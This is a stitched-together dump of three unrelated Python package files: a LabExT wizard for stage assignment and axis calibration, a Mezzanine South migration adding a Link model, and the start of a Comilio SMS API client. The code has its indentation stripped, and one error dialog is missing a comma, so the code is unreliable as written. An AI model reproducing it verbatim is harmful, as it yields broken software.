text="Below you can see all Stage classes available in LabExT.\nSo that all stages can be found correctly in the following step, make sure that the drivers for each class are loaded."
).pack(side=TOP, fill=X)
if not self.mover.stage_classes:
Label(
frame,
text="No stage classes found!",
foreground="#FF3333").pack(
side=TOP,
fill=X)
for stage_name, stage_cls in self.mover.stage_classes.items():
stage_driver_frame = Frame(frame)
stage_driver_frame.pack(side=TOP, fill=X, pady=2)
Label(
stage_driver_frame,
text=f"[{stage_cls.__name__}] {stage_cls.description}"
).pack(side=LEFT, fill=X)
stage_driver_load = Button(
stage_driver_frame,
text="Load Driver",
state=NORMAL if stage_cls.driver_specifiable else DISABLED,
command=partial(
stage_cls.load_driver,
parent=self.wizard))
stage_driver_load.pack(side=RIGHT)
stage_driver_status = Label(
stage_driver_frame,
text="Loaded" if stage_cls.driver_loaded else "Not Loaded",
foreground='#4BB543' if stage_cls.driver_loaded else "#FF3333",
)
stage_driver_status.pack(side=RIGHT, padx=10)
class StageAssignmentStep(Step):
"""
Wizard Step to assign and connect stages.
"""
POLYGON_OPTIONS = {
pg.__name__: pg for pg in StagePolygon.find_polygon_classes()}
ASSIGNMENT_MENU_PLACEHOLDER = "-- unused --"
DEFAULT_POLYGON = SingleModeFiber
DEFAULT_ASSIGNMENT = (
ASSIGNMENT_MENU_PLACEHOLDER,
DevicePort.INPUT)
def __init__(self, wizard, mover) -> None:
"""
Constructor for new Wizard step for assigning stages.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
"""
super().__init__(
wizard,
self.build,
on_reload=self.on_reload,
title="Stage Connection")
self.mover: Type[MoverNew] = mover
self.assignment = {
c.stage: (o, p)
for (o, p), c in self.mover.calibrations.items()}
self.polygon_cfg = {
c.stage: (c.stage_polygon.__class__, c.stage_polygon.parameters)
for c in self.mover.calibrations.values()}
self.orientation_vars, self.port_vars, self.polygon_vars = self._build_assignment_variables()
self._stage_polygon_parameter_tables = {}
def build(self, frame: Type[CustomFrame]) -> None:
"""
Builds step to assign stages.
Parameters
----------
frame : CustomFrame
Instance of a customized Tkinter frame.
"""
frame.title = "Manage Stage Connections"
Label(
frame,
text="Below you can see all the stages found by LabExT.\nIf stages are missing, go back one step and check if all drivers are loaded."
).pack(side=TOP, fill=X)
available_stages_frame = CustomFrame(frame)
available_stages_frame.title = "Available Stages"
available_stages_frame.pack(side=TOP, fill=X)
CustomTable(
parent=available_stages_frame,
selectmode='none',
columns=(
'ID', 'Description', 'Stage Class', 'Address', 'Connected'
),
rows=[
(idx,
s.__class__.description,
s.__class__.__name__,
s.address_string,
s.connected)
for idx, s in enumerate(self.mover.available_stages)])
stage_assignment_frame = CustomFrame(frame)
stage_assignment_frame.title = "Assign Stages"
stage_assignment_frame.pack(side=TOP, fill=X)
for avail_stage in self.mover.available_stages:
available_stage_frame = Frame(stage_assignment_frame)
available_stage_frame.pack(side=TOP, fill=X, pady=2)
Label(
available_stage_frame, text=str(avail_stage), anchor="w"
).pack(side=LEFT, fill=X, padx=(0, 10))
polygon_menu = OptionMenu(
available_stage_frame,
self.polygon_vars[avail_stage],
*(list(self.POLYGON_OPTIONS.keys()))
)
polygon_menu.pack(side=RIGHT, padx=5)
polygon_menu.config(state=DISABLED if self.orientation_vars[avail_stage].get(
) == self.ASSIGNMENT_MENU_PLACEHOLDER else NORMAL)
Label(
available_stage_frame, text="Stage type:"
).pack(side=RIGHT, fill=X, padx=5)
port_menu = OptionMenu(
available_stage_frame,
self.port_vars[avail_stage],
*(list(DevicePort))
)
port_menu.pack(side=RIGHT, padx=5)
port_menu.config(state=DISABLED if self.orientation_vars[avail_stage].get(
) == self.ASSIGNMENT_MENU_PLACEHOLDER else NORMAL)
Label(
available_stage_frame, text="Device Port:"
).pack(side=RIGHT, fill=X, padx=5)
OptionMenu(
available_stage_frame,
self.orientation_vars[avail_stage],
*([self.ASSIGNMENT_MENU_PLACEHOLDER] + list(Orientation))
).pack(side=RIGHT, padx=5)
Label(
available_stage_frame, text="Stage Orientation:"
).pack(side=RIGHT, fill=X, padx=5)
# Enable configuration if orientation is selected
if self.orientation_vars[avail_stage].get(
) != self.ASSIGNMENT_MENU_PLACEHOLDER:
polygon_cfg_frame = Frame(stage_assignment_frame)
polygon_cfg_frame.pack(side=TOP, fill=X)
polygon_cls, polygon_cls_cfg = self.polygon_cfg.get(
avail_stage, (self.DEFAULT_POLYGON, self.DEFAULT_POLYGON.get_default_parameters()))
polygon_params = {
l: MeasParamAuto(
value=v) for l,
v in polygon_cls_cfg.items()}
polygon_cfg_table = ParameterTable(polygon_cfg_frame)
polygon_cfg_table.title = f"Configure Polygon: {polygon_cls.__name__}"
polygon_cfg_table.parameter_source = polygon_params
polygon_cfg_table.pack(
side=TOP, fill=X, expand=0, padx=2, pady=2)
self._stage_polygon_parameter_tables[avail_stage] = polygon_cfg_table
def on_reload(self) -> None:
"""
        Callback when the wizard step gets reloaded.
Checks if there is an assignment and if no stage, orientation or port was used twice.
"""
if not self.assignment:
self.finish_step_enabled = False
self.wizard.set_error("Please assign at least one to proceed.")
return
orientations, ports = zip(*self.assignment.values())
double_orientations = len(orientations) != len(set(orientations))
        double_ports = len(ports) != len(set(ports))
        if double_orientations or double_ports:
            self.finish_step_enabled = False
            self.wizard.set_error(
                "Please do not assign an orientation or device port twice.")
return
self.finish_step_enabled = True
self.wizard.set_error("")
def change_assignment(self, stage: Stage) -> None:
"""
        Callback when the user changes a stage assignment.
Updates internal wizard state and reloads contents.
"""
port = self.port_vars[stage].get()
orientation = self.orientation_vars[stage].get()
polygon_cls_name = self.polygon_vars[stage].get()
polygon_cls = self.POLYGON_OPTIONS[polygon_cls_name]
if orientation == self.ASSIGNMENT_MENU_PLACEHOLDER:
self.assignment.pop(stage, None)
self.wizard.__reload__()
return
if stage in self._stage_polygon_parameter_tables:
polygon_cls_cfg = self._stage_polygon_parameter_tables[stage].make_json_able(
)
else:
polygon_cls_cfg = polygon_cls.get_default_parameters()
self.polygon_cfg[stage] = (polygon_cls, polygon_cls_cfg)
self.assignment[stage] = (
Orientation[orientation.upper()],
DevicePort[port.upper()])
self.wizard.__reload__()
def update_polygon_cfg(self) -> None:
"""
Updates polygon configuration by reading values from table.
"""
for stage, polygon_cfg_table in self._stage_polygon_parameter_tables.items():
polygon_cls_name = self.polygon_vars[stage].get()
polygon_cls = self.POLYGON_OPTIONS[polygon_cls_name]
self.polygon_cfg[stage] = (
polygon_cls, polygon_cfg_table.make_json_able())
def _build_assignment_variables(self) -> tuple:
"""
        Builds and returns Tkinter variables for orientation and port selection.
"""
orientation_vars = {}
port_vars = {}
polygon_vars = {}
for stage in self.mover.available_stages:
orientation, port = self.assignment.get(
stage, self.DEFAULT_ASSIGNMENT)
polygon_cls, _ = self.polygon_cfg.get(
stage, (self.DEFAULT_POLYGON, {}))
port_var = StringVar(self.wizard, port)
port_var.trace(
W, lambda *_, stage=stage: self.change_assignment(stage))
orientation_var = StringVar(self.wizard, orientation)
orientation_var.trace(
W, lambda *_, stage=stage: self.change_assignment(stage))
polygon_var = StringVar(self.wizard, polygon_cls.__name__)
polygon_var.trace(
W, lambda *_, stage=stage: self.change_assignment(stage))
orientation_vars[stage] = orientation_var
port_vars[stage] = port_var
polygon_vars[stage] = polygon_var
return orientation_vars, port_vars, polygon_vars
class ConfigureMoverStep(Step):
def __init__(self, wizard, mover) -> None:
super().__init__(
wizard,
self.build,
finish_step_enabled=True,
title="Stage Configuration")
self.mover: Type[MoverNew] = mover
self.xy_speed_var = DoubleVar(
self.wizard,
self.mover.speed_xy if self.mover._speed_xy else self.mover.DEFAULT_SPEED_XY)
self.z_speed_var = DoubleVar(
self.wizard,
self.mover.speed_z if self.mover._speed_z else self.mover.DEFAULT_SPEED_Z)
self.xy_acceleration_var = DoubleVar(
self.wizard,
self.mover.acceleration_xy if self.mover._acceleration_xy else self.mover.DEFAULT_ACCELERATION_XY)
self.z_lift_var = DoubleVar(
self.wizard,
self.mover.z_lift if self.mover._z_lift else self.mover.DEFAULT_Z_LIFT)
def build(self, frame: Type[CustomFrame]):
"""
Builds step to configure stages.
"""
frame.title = "Configure Assigned Stages"
Label(
frame,
text="Configure the selected stages.\nThese settings are applied globally to all selected stages."
).pack(side=TOP, fill=X)
stage_properties_frame = CustomFrame(frame)
stage_properties_frame.title = "Speed and Acceleration Settings"
stage_properties_frame.pack(side=TOP, fill=X)
Label(
stage_properties_frame,
anchor="w",
text="Speed Hint: A value of 0 (default) deactivates the speed control feature. The stage will move as fast as possible!"
).pack(side=TOP, fill=X)
Label(
stage_properties_frame,
anchor="w",
text="Acceleration Hint: A value of 0 (default) deactivates the acceleration control feature."
).pack(side=TOP, fill=X)
self._build_entry_with_label(
stage_properties_frame,
self.xy_speed_var,
label="Movement speed xy direction (valid range: {}...{:.0e}um/s):".format(
self.mover.SPEED_LOWER_BOUND,
self.mover.SPEED_UPPER_BOUND),
unit="[um/s]")
self._build_entry_with_label(
stage_properties_frame,
self.z_speed_var,
label="Movement speed z direction (valid range: {}...{:.0e}um/s):".format(
self.mover.SPEED_LOWER_BOUND,
self.mover.SPEED_UPPER_BOUND),
unit="[um/s]")
self._build_entry_with_label(
stage_properties_frame,
self.xy_acceleration_var,
label="Movement acceleration xy direction (valid range: {}...{:.0e}um/s^2):".format(
self.mover.ACCELERATION_LOWER_BOUND,
self.mover.ACCELERATION_UPPER_BOUND),
unit="[um/s^2]")
self._build_entry_with_label(
stage_properties_frame,
self.z_lift_var,
label="Z channel up-movement during xy movement:",
unit="[um]")
def _build_entry_with_label(
self,
parent,
var: Type[DoubleVar],
label: str = None,
unit: str = None) -> None:
"""
Builds an tkinter entry with label and unit.
"""
entry_frame = Frame(parent)
entry_frame.pack(side=TOP, fill=X, pady=2)
Label(entry_frame, text=label).pack(side=LEFT)
Label(entry_frame, text=unit).pack(side=RIGHT)
entry = Entry(entry_frame, textvariable=var)
entry.pack(side=RIGHT, padx=10)
class AxesCalibrationStep(Step):
"""
Wizard Step to calibrate stage axes.
"""
STAGE_AXIS_OPTIONS = bidict({o: " ".join(map(str, o))
for o in product(Direction, Axis)})
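    # Keys are (Direction, Axis) tuples, values the space-joined string labels
    # shown in the OptionMenus (exact text depends on the enums' __str__);
    # the bidict enables the reverse lookup used in calibrate_axis().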
def __init__(self, wizard, mover) -> None:
"""
Constructor for new Wizard step for calibrating stage axes.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
"""
super().__init__(
wizard,
self.build,
on_reload=self.on_reload,
on_next=self.on_next,
title="Stage Axes Calibration")
self.mover: Type[MoverNew] = mover
self.logger = getLogger()
self.axes_mapping_vars = self._build_axes_mapping_vars()
def _build_axes_mapping_vars(self):
"""
Builds and returns Tkinter variables for axes calibration.
"""
vars = {}
for calibration in self.mover.calibrations.values():
# Get current mapping
_current_mapping = {}
if calibration._axes_rotation and calibration._axes_rotation.is_valid:
_current_mapping = calibration._axes_rotation.mapping
for chip_axis in Axis:
_current_value = _current_mapping.get(
chip_axis, (Direction.POSITIVE, chip_axis))
str_var = StringVar(self.wizard, _current_value)
str_var.trace(
W,
lambda *_,
calibration=calibration,
chip_axis=chip_axis: self.calibrate_axis(
calibration,
chip_axis))
vars.setdefault(calibration, {})[chip_axis] = str_var
return vars
def build(self, frame: Type[CustomFrame]):
"""
Builds step to calibrate axes.
Parameters
----------
frame : CustomFrame
Instance of a customized Tkinter frame.
"""
frame.title = "Fix Coordinate System"
Label(
frame,
text="In order for each stage to move relative to the chip coordinates, the direction of each axis of each stage must be defined. \n Postive Y-Axis: North of chip, Positive X-Axis: East of chip, Positive Z-Axis: Lift stage"
).pack(side=TOP, fill=X)
for calibration in self.mover.calibrations.values():
stage_calibration_frame = CustomFrame(frame)
stage_calibration_frame.title = str(calibration)
stage_calibration_frame.pack(side=TOP, fill=X, pady=2)
for chip_axis in Axis:
chip_axis_frame = Frame(stage_calibration_frame)
chip_axis_frame.pack(side=TOP, fill=X)
Label(
chip_axis_frame,
text="Positive {}-Chip-axis points to ".format(chip_axis.name)
).pack(side=LEFT)
OptionMenu(
chip_axis_frame,
self.axes_mapping_vars[calibration][chip_axis],
*self.STAGE_AXIS_OPTIONS.values(),
).pack(side=LEFT)
Label(chip_axis_frame, text="of Stage").pack(side=LEFT)
wiggle_button = Button(
chip_axis_frame,
text="Wiggle {}-Axis".format(
chip_axis.name),
command=lambda axis=chip_axis,
calibration=calibration: self.wiggle_axis(
calibration,
axis),
state=NORMAL if calibration._axes_rotation.is_valid else DISABLED)
wiggle_button.pack(side=RIGHT)
def on_reload(self) -> None:
"""
        Callback when the coordinate system fixation step gets reloaded.
        Checks if the current assignment is valid.
"""
if all(c._axes_rotation.is_valid for c in self.mover.calibrations.values()):
self.next_step_enabled = True
self.wizard.set_error("")
else:
self.next_step_enabled = False
self.wizard.set_error("Please do not assign a stage axis twice.")
def on_next(self) -> bool:
"""
        Callback when the user finishes the axes calibration.
Stores rotation to file.
"""
try:
self.mover.dump_axes_rotations()
except Exception as err:
messagebox.showerror(
"Error",
f"Failed to store axes rotation to file: {err}",
parent=self.wizard)
return False
return True
def calibrate_axis(self, calibration: Type[Calibration], chip_axis: Axis):
"""
        Callback when the user wants to change the axis rotation of a calibration.
"""
axis_var = self.axes_mapping_vars[calibration][chip_axis]
direction, stage_axis = self.STAGE_AXIS_OPTIONS.inverse[axis_var.get()]
calibration.update_axes_rotation(chip_axis, direction, stage_axis)
self.wizard.__reload__()
def wiggle_axis(self, calibration: Type[Calibration], chip_axis: Axis):
"""
        Callback when the user wants to wiggle an axis.
Parameters
----------
calibration: Calibration
Instance of a calibration
chip_axis: Axis
Requested chip axis to wiggle
"""
if not self._confirm_wiggle(chip_axis):
return
try:
run_with_wait_window(
self.wizard,
f"Wiggle {chip_axis} of {calibration}",
lambda: calibration.wiggle_axis(chip_axis))
except RuntimeError as e:
self.logger.log(f"Wiggling {chip_axis} failed: {e}")
messagebox.showerror(
"Error"
f"Wiggling {chip_axis} failed: {e}",
parent=self.wizard)
def _confirm_wiggle(self, axis) -> bool:
"""
        Confirms with the user that wiggling is allowed.
"""
message = 'By proceeding this button will move the stage along the {} direction. \n\n'.format(axis) \
+ 'Please make sure it has enough travel range(+-5mm) to avoid collision. \n\n' \
+ 'For correct operation the stage should: \n' \
+ 'First: Move in positive {}-Chip-Axis direction \n'.format(axis) \
+ 'Second: Move in negative {}-Chip-Axis direction \n\n'.format(axis) \
+ 'If not, please check your assignments.\n Do you want to proceed with wiggling?'
return messagebox.askokcancel("Warning", message, parent=self.wizard)
class CoordinatePairingStep(Step):
"""
Wizard Step to fully calibrate stages.
"""
def __init__(self, wizard, mover, chip) -> None:
"""
Constructor for new Wizard step for fully calibrate stages.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
chip : Chip
Instance of the current chip.
"""
super().__init__(
wizard,
self.build,
finish_step_enabled=True,
on_reload=self.on_reload,
title="Stage Configuration")
self.mover: Type[MoverNew] = mover
self.chip: Type[Chip] = chip
self._use_input_stage_var = BooleanVar(
self.wizard, self.mover.has_input_calibration)
self._use_output_stage_var = BooleanVar(
self.wizard, self.mover.has_output_calibration)
self._full_calibration_new_pairing_button = None
self._coordinate_pairing_table = None
self._coordinate_pairing_window = None
self.pairings = self._build_pairings()
def _build_pairings(self) -> list:
"""
Returns a list of current pairings.
"""
pairings = []
for calibration in self.mover.calibrations.values():
_kabsch_rotation = calibration._kabsch_rotation
if _kabsch_rotation and _kabsch_rotation.is_valid:
pairings += _kabsch_rotation.pairings
_single_point_offset = calibration._single_point_offset
if _single_point_offset and _single_point_offset.is_valid:
if _single_point_offset.pairing not in pairings:
pairings.append(_single_point_offset.pairing)
return pairings
def build(self, frame: Type[CustomFrame]):
"""
Builds step to fully calibrate axes.
Parameters
----------
frame : CustomFrame
Instance of a customized Tkinter frame.
"""
frame.title = "Calibrate Stage to enable absolute movement"
Label(
frame,
text="To move the stages absolutely in chip coordinates, define at least 3 stage-chip-coordinate pairings to calculate the rotation. \n" +
"Note: After the first coordinate pairing, the stages can be moved approximatively absolute in chip coordinates.").pack(
side=TOP,
fill=X)
# Render frame to for current chip
chip_frame = CustomFrame(frame)
chip_frame.title = "Imported Chip"
chip_frame.pack(side=TOP, fill=X, pady=5)
Label(
chip_frame,
text="The calibration is calculated using several coordinate pairs consisting of chip and stage coordinates. \n"
"The following chip is used for calibration:").pack(
side=TOP,
fill=X)
if self.chip:
Label(
chip_frame,
text=f"{self.chip.name} (imported from {self.chip.path})",
foreground='#4BB543'
).pack(side=LEFT, fill=X)
else:
Label(
chip_frame,
text="No Chip imported!",
foreground='#FF3333'
).pack(side=LEFT, fill=X)
Button(
chip_frame,
text="Import Chip",
command=self._on_chip_import
).pack(side=RIGHT)
# Render table with all defined pairings
pairings_frame = CustomFrame(frame)
pairings_frame.title = "Defined Pairings"
pairings_frame.pack(side=TOP, fill=X, pady=5)
pairings_table_frame = Frame(pairings_frame)
pairings_table_frame.pack(side=TOP, fill=X, expand=False)
self._coordinate_pairing_table = CustomTable(
parent=pairings_table_frame,
selectmode='extended',
columns=(
'ID',
'Stage',
                'Stage Coordinate',
'Device',
'Chip Coordinate'),
rows=[(
str(idx),
str(p.calibration),
str(p.stage_coordinate),
str(p.device.short_str),
str(p.chip_coordinate)
) for idx, p in enumerate(self.pairings)])
Button(
pairings_frame,
text="Remove selected pairings",
state=DISABLED if len(self.pairings) == 0 else NORMAL,
command=self._remove_pairings
).pack(side=LEFT)
Button(
pairings_frame,
text="Reset all pairings",
state=DISABLED if len(self.pairings) == 0 else NORMAL,
command=self._reset_all_pairings
).pack(side=RIGHT)
# Render frame to show current calibration state
calibration_summary_frame = CustomFrame(frame)
calibration_summary_frame.pack(side=TOP, fill=X, pady=5)
for calibration in self.mover.calibrations.values():
stage_calibration_frame = CustomFrame(calibration_summary_frame)
stage_calibration_frame.title = str(calibration)
stage_calibration_frame.pack(side=TOP, fill=X, pady=2)
# SINGLE POINT STATE
Label(
stage_calibration_frame,
text="Single Point Fixation:"
).grid(row=0, column=0, padx=2, pady=2, sticky=W)
Label(
stage_calibration_frame,
text=calibration._single_point_offset,
foreground='#4BB543' if calibration._single_point_offset.is_valid else "#FF3333",
).grid(
row=0,
column=1,
padx=2,
pady=2,
sticky=W)
# GLOBAL STATE
Label(
stage_calibration_frame,
text="Global Transformation:"
).grid(row=1, column=0, padx=2, pady=2, sticky=W)
Label(
stage_calibration_frame,
text=calibration._kabsch_rotation,
foreground='#4BB543' if calibration._kabsch_rotation.is_valid else "#FF3333",
).grid(
row=1,
column=1,
padx=2,
pady=2,
sticky=W)
if calibration._kabsch_rotation.is_valid:
rad, deg, per = calibration._kabsch_rotation.get_z_plane_angles()
Label(
stage_calibration_frame,
text="Angle between XY Plane: "
"{:.2f} rad - {:.2f}° - {:.2f}%".format(rad, deg, per)
).grid(row=2, column=1, padx=2, pady=2, sticky=W)
# FRAME FOR NEW PAIRING
new_pairing_frame = CustomFrame(frame)
new_pairing_frame.title = "Create New Pairing"
new_pairing_frame.pack(side=TOP, fill=X, pady=5)
if self.mover.has_input_calibration:
Checkbutton(
new_pairing_frame,
text="Use Input-Stage for Pairing",
state=NORMAL if self.chip else DISABLED,
variable=self._use_input_stage_var
).pack(side=LEFT)
if self.mover.has_output_calibration:
Checkbutton(
new_pairing_frame,
text="Use Output-Stage for Pairing",
state=NORMAL if self.chip else DISABLED,
variable=self._use_output_stage_var
).pack(side=LEFT)
self._full_calibration_new_pairing_button = Button(
new_pairing_frame,
text="New Pairing...",
state=NORMAL if self.chip else DISABLED,
command=self._new_coordinate_pairing)
self._full_calibration_new_pairing_button.pack(side=RIGHT)
def on_reload(self):
"""
        Callback when the wizard step gets reloaded.
        Checks if all transformations are valid.
"""
if not self.chip:
self.next_step_enabled = False
self.finish_step_enabled = False
self.wizard.set_error("Please import a chip to calibrate stages.")
return
if not all(
c._single_point_offset.is_valid for c in self.mover.calibrations.values()):
self.next_step_enabled = False
self.finish_step_enabled = False
self.wizard.set_error("Please fix for each stage a single point.")
return
if not all(
c._kabsch_rotation.is_valid for c in self.mover.calibrations.values()):
self.next_step_enabled = False
self.finish_step_enabled = True
self.wizard.set_error(
"Please define for each stage at least three points to calibrate the stages globally.")
return
self.finish_step_enabled = True
self.next_step_enabled = True
self.wizard.set_error("")
def _reset_all_pairings(self):
"""
Resets all pairings if the user confirms before.
"""
if len(self.pairings) == 0:
return
if not messagebox.askokcancel(
"Reset all pairings",
f"Are you sure to delete all {len(self.pairings)} coordinate pairs? "
"This step cannot be undone.",
parent=self.wizard):
return
for calibration in self.mover.calibrations.values():
calibration.reset_single_point_offset()
calibration.reset_kabsch_rotation()
self.pairings = []
self.wizard.__reload__()
def _remove_pairings(self):
"""
Removes all selected pairings.
"""
if len(self.pairings) == 0:
return
blacklisted_pairings = self._get_selected_pairings()
if len(blacklisted_pairings) == 0:
messagebox.showerror(
"No pairings selected",
"No pairings were selected for deletion.",
parent=self.wizard)
return
whitelisted_pairings = [
p for p in self.pairings if p not in blacklisted_pairings]
# Reset all
for calibration in self.mover.calibrations.values():
calibration.reset_single_point_offset()
calibration.reset_kabsch_rotation()
self.pairings = []
# Calc new transformations
self._save_coordinate_pairing(whitelisted_pairings)
self.wizard.__reload__()
def _get_selected_pairings(self) -> List[CoordinatePairing]:
"""
Returns a list of selected pairings in table.
"""
if not self._coordinate_pairing_table:
return []
selected_pairings = []
checked_iids = self._coordinate_pairing_table._tree.selection()
for iid in checked_iids:
pairing_idx = self._coordinate_pairing_table._tree.set(iid, 0)
try:
selected_pairings.append(
self.pairings[int(pairing_idx)])
except (IndexError, ValueError):
continue
return selected_pairings
def _new_coordinate_pairing(self):
"""
Creates a window to create a coordinate pairing.
"""
if self._check_for_exisiting_coordinate_window():
return
with_input_stage = self._use_input_stage_var.get()
with_output_stage = self._use_output_stage_var.get()
if not with_input_stage and not with_output_stage:
messagebox.showwarning(
"No Stages selected",
"No stages have been selected with which to create a coordinate pairing. "
"At least one stage must be selected.",
parent=self.wizard)
return
try:
self._coordinate_pairing_window = CoordinatePairingsWindow(
self.wizard,
self.mover,
self.chip,
experiment_manager=self.wizard.experiment_manager,
on_finish=self._save_coordinate_pairing,
with_input_stage=with_input_stage,
with_output_stage=with_output_stage)
except Exception as e:
messagebox.showerror(
"Error",
"Could not initiate a new coordinate pairing: {}".format(e),
parent=self.wizard)
def _save_coordinate_pairing(self, pairings: List[CoordinatePairing]):
"""
Delegates the list of pairings to the responsible calibrations.
"""
for p in pairings:
if not p.calibration._single_point_offset.is_valid:
p.calibration.update_single_point_offset(p)
p.calibration.update_kabsch_rotation(p)
self.pairings.append(p)
self.wizard.__reload__()
def _check_for_exisiting_coordinate_window(self) -> bool:
"""
Ensures that only one window exists to create a new coordinate pair.
        Returns True if there is an existing window.
"""
if self._coordinate_pairing_window is None or not try_to_lift_window(
self._coordinate_pairing_window):
return False
if not messagebox.askyesno(
"New Coordinate-Pairing",
"You have an incomplete creation of a coordinate pair. Click Yes if you want to continue it or No if you want to create the new one.",
parent=self._coordinate_pairing_window):
self._coordinate_pairing_window.cancel()
self._coordinate_pairing_window = None
return False
return True
def _on_chip_import(self) -> None:
"""
        Callback when the user wants to import a chip.
"""
if not self.wizard.experiment_manager:
return
self.wizard.experiment_manager.main_window.open_import_chip()
self.chip = self.wizard.experiment_manager.chip
self.wizard.__reload__() | PypiClean |
/MezzanineFor1.7-3.1.10.tar.gz/MezzanineFor1.7-3.1.10/mezzanine/pages/migrations/south/0008_auto__add_link.py | import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Link'
db.create_table('pages_link', (
('page_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['pages.Page'], unique=True, primary_key=True)),
))
db.send_create_signal('pages', ['Link'])
def backwards(self, orm):
# Deleting model 'Link'
db.delete_table('pages_link')
models = {
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'generic.assignedkeyword': {
'Meta': {'ordering': "('_order',)", 'object_name': 'AssignedKeyword'},
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'assignments'", 'to': "orm['generic.Keyword']"}),
'object_pk': ('django.db.models.fields.IntegerField', [], {})
},
'generic.keyword': {
'Meta': {'object_name': 'Keyword'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'pages.link': {
'Meta': {'ordering': "('_order',)", 'object_name': 'Link', '_ormbases': ['pages.Page']},
'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'})
},
'pages.page': {
'Meta': {'ordering': "('titles',)", 'object_name': 'Page'},
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_footer': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
#'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': "orm['generic.AssignedKeyword']"}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['pages.Page']"}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'})
},
'pages.richtextpage': {
'Meta': {'ordering': "('_order',)", 'object_name': 'RichTextPage', '_ormbases': ['pages.Page']},
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['pages'] | PypiClean |
/Comilio-1.0.0.tar.gz/Comilio-1.0.0/comilio/client.py | import re
import requests
from . import exceptions
__all__ = [
'Client',
'API_URL',
'CLASSIC',
'SMART',
'SMARTPRO',
]
_NUMBER_FORMAT_REGEX = re.compile(r'^\+?[0-9]{4,14}$')
API_URL = 'https://api.comilio.it/rest/v1'
CLASSIC = 'Classic'
SMART = 'Smart'
SMARTPRO = 'SmartPro'
class Client(object):
def __init__(self, username, password):
self._auth = (username, password, )
self.default_type = CLASSIC
self.default_sender = None
self.default_recipients = None
self.raise_insufficient_credit = False
def set_default_type(self, type):
if self._check_type(type):
self.default_type = type
def set_default_sender(self, sender):
if self._check_sender(sender):
self.default_sender = sender
else:
raise exceptions.ComilioException('Sender "%s" is not valid' % sender)
def set_default_recipients(self, recipients, ignore_invalid=False):
recipients, invalid = self._check_recipients(recipients, ignore_invalid)
self.default_recipients = recipients
return invalid
def send(self, message, recipients=None, type=None, sender=None):
if not message:
raise exceptions.ComilioException('SMS message text cannot be empty')
if recipients:
recipients = self._check_recipients(recipients)[0]
else:
if not self.default_recipients:
raise exceptions.ComilioException('No recipient provided')
recipients = self.default_recipients
if type and self._check_type(type):
sms_type = type
else:
sms_type = self.default_type
payload = {
'message_type': sms_type,
'phone_numbers': recipients,
'text': message,
}
if sender:
if self._check_sender(sender):
payload['sender_string'] = sender
else:
raise exceptions.ComilioException('Sender "%s" is not valid' % sender)
elif self.default_sender:
payload['sender_string'] = self.default_sender
req = self.post('/message', payload)
if req.status_code != 200:
exc = exceptions.ComilioException('Unable to send SMS')
exc.payload = req.text
raise exc
data = req.json()
return data
def status(self, message_id):
req = self.get('/message/%s' % message_id)
if req.status_code != 200:
exc = exceptions.ComilioException('Unable to get SMS status')
exc.payload = req.text
raise exc
data = req.json()
return data
@staticmethod
def is_valid_number(number):
